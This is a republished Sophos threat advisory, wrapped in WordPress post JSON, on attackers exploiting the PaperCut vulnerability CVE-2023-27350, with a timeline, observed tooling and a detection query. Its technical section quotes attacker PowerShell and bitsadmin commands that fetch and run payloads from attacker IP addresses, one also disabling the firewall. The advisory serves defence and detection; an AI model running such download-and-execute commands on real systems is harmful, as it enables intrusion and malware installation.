{"id":21893,"date":"2023-05-02T03:20:54","date_gmt":"2023-05-02T11:20:54","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/05\/02\/news-15624\/"},"modified":"2023-05-02T03:20:54","modified_gmt":"2023-05-02T11:20:54","slug":"news-15624","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/05\/02\/news-15624\/","title":{"rendered":"Update 1: Increased exploitation of PaperCut drawing blood around the Internet"},"content":{"rendered":"

Credit to Author: Angela Gunn| Date: Thu, 27 Apr 2023 18:43:38 +0000<\/strong><\/p>\n

\n

Last updated 2023-05-02 08:45:00: Added \u201cTimeline and Other Sophos Information\u201d section<\/em><\/p>\n

2023-04-26 17:50:00: First publication<\/em><\/p>\n

Sophos X-Ops MDR and SophosLabs teams have been monitoring and researching activity around the PaperCut vulnerability CVE-2023-27350 since April 13, 2023. In this posting we outline our observations on the threat environment around this vulnerability.<\/span><\/p>\n

On April 19, 2023, software company PaperCut published an update to their advisory<\/a> indicating exploitation of CVE-2023-27350 has been reported in the wild. PaperCut offers multi-platform print management software, popular in the education sector. The vulnerability leveraged in the attack was in fact already addressed by a patch released the month prior \u2013 a situation commonly called an n<\/em>-day attack.<\/p>\n

This vulnerability affects PaperCut MF and NG Application and Site Servers version 8.0 and above across all supported operating systems. A patch was made available on March 8 and Sophos recommends that you apply it<\/a> at the earliest opportunity on all vulnerable servers.<\/p>\n

Sophos\u2019 earliest observation of an affected user occurred on April 13. That attack was identified by a SophosLabs threat researcher when Cobalt Strike was detected during post-exploitation activity. On April 17 — four days later and two days prior to the public announcement — Sophos MDR detected exploitation of a vulnerable PaperCut server at a customer in North America. We quickly contained the affected server and engaged the customer to proceed with remediation.<\/p>\n

To date, we have observed multiple threat groups target potential victims globally, with an overweight percentage in the educational sector.<\/p>\n

Technical Details<\/h3>\n

The vulnerability details provided by Trend Micro\u2019s ZDI<\/a> indicate that the code allowing authentication bypass and remote code execution is found in the SetupCompleted Java class. At the time of exploitation, Sophos MDR observed the following error log being generated:<\/p>\n

\"Two<\/a><\/p>\n

Figure 1: Error messages are an early sign that something is amiss<\/em><\/p>\n

Post-exploitation activity often results in PowerShell commands being executed by the pc-app.exe parent process, as seen in Figure 2 downloading Atera remote monitoring software to the victim. (Atera is of course legitimate software, seen in this situation being abused by the attackers.).<\/p>\n

\"PowerShell<\/a><\/p>\n

Figure 2: PowerShell download of legitimate-but-abused Atera software<\/em><\/p>\n

This is just one example observed, as different threat groups execute PowerShell in a variety of ways.<\/p>\n

powershell\u00a0 IEX ((New-Object Net.WebClient).DownloadString ('http:\/\/137.184.56[.]77:443\/for.ps1'))    powershell.exe Invoke-WebRequest http:\/\/137.184.56.[]77:443\/c.bat    -OutFile c.bat      powershell $url=\"https:\/\/tmpfiles[.]org\/dl\/1337855\/enc.txt\" $dst=\"C:encexe\" netsh advfirewall set allprofiles state off Invoke-WebRequest $url -OutFile $dst Start-Process $dst -windowstyle hidden Start-Sleep -s 10<\/pre>\n
Sophos MDR has also observed the use of BITSAdmin, a commonly abused LOLBin<\/a>, to download additional tools.<\/p>\n
bitsadmin \/transfer dwa \/download \/priority FOREGROUND http[:]\/\/23.184.48[.]17\/bootcamp.zip C:ProgramDatabootcamp.zip    bitsadmin \/transfer mydownloadjob \/download \/priority normal http[:]\/\/192.184.35[.]216:443\/4591187629.exe %WINDIR%setup2.exe<\/pre>\n
The tools exploited in the attacks have included what we refer to as \u201cdual-use agents,\u201d used both legitimately by IT staff and maliciously by attackers. At the time of writing, Sophos has observed the abuse of AnyDesk, Atera, Synchro, TightVNC, NetSupport, and DWAgent remote management tools across multiple campaigns.<\/p>\n
Additionally, some of the final payloads overlap with previously reported threats such as Truebot (downloader, often linked to Cl0p ransomware), Buhti (ransomware), MoneroOcean (coinminer<\/a>), and Mirai (botnet). One such example of a miner, shown in Figure 3, details the commands to kill other miners before launching their own Monero (XMR) mining software.<\/p>\n
\"Finding<\/a><\/p>\n
Figure 3: Miner-on-miner violence<\/em><\/p>\n
Determining impact with Sophos XDR<\/h3>\n
Upon receiving updated threat intelligence, Sophos MDR threat hunters immediately started searching across our customer base for any additional affected users. The following SQL query can be used by Sophos XDR customers in their Sophos Central console to identify any suspicious activity, as well as be converted into a Sigma rule for non-Sophos customers. Generally, command-line executions performing system discovery with native tools (LOLBins) such as whoami, nltest, and systeminfo can indicate compromise and lead to the point of initial access. If suspicious commands are observed, it is recommended to perform system isolation while the system is under investigation. Note that a common false positive observed in the process activity was the PaperCut print archive function.<\/p>\n
SELECT    date_format(from_unixtime(TIME,'%Y-%m-%d %H:%i:%s') AS date_time,    customer_id,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 meta_hostname,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 parent_name,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 parent_cmdline,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 name,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 cmdline,    \u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0 sophos_pid    FROM    \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 xdr_data    WHERE    \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 AND query_name = 'running_processes_windows_sophos'    \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 AND LOWER(parent_name) = 'pc-app.exe'    \u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 AND (LOWER(name) = 'cmd.exe'    \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 OR LOWER(name) = 'powershell.exe')<\/pre>\n
As noted above, a patch is available; this situation falls into the category of attacks known as \u201cn<\/em>-days\u201d \u2013 an exploit that appears very soon after a patch is issued. Potentially affected users are encouraged to review and apply the patch as soon as possible. Our GitHub includes<\/a> a set of Indicators of Compromise associated with this attack campaign. Sophos Labs continues to monitor the situation closely for potential AV detections.<\/p>\n
Timeline and Further Sophos Resources<\/h3>\n
As our investigation continues, we\u2019ve developed a (simplified) timeline of PaperCut-related events as they unfolded in our data. In addition, there\u2019s more information about PaperCut on the Naked Security blog<\/a> (which includes a tidy checklist for PaperCut customers) and the Naked Security podcast<\/a>.<\/p>\n
\"A<\/a><\/p>\n
Acknowledgements<\/h3>\n
Benjamin Sollman, Colin Cowie, Greg Iddon, and Gabor Szappanos contributed to this report.<\/p>\n<\/p><\/div>\n
http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/p>\n
Credit to Author: Angela Gunn| Date: Thu, 27 Apr 2023 18:43:38 +0000<\/strong><\/p>\n
A recent remote code execution (RCE) vulnerability is increasingly in use to deliver Cobalt Strike and other remote management software, along with multiple ransomware threats \u2013 what you need to know about CVE-2023-27350<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[29220,129,25038,29221,29216,24552,27604],"class_list":["post-21893","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-cve-2023-27350","tag-featured","tag-mdr","tag-mdr-flash","tag-papercut","tag-security-operations","tag-sophos-mdr"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21893","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21893"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21893\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21893"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}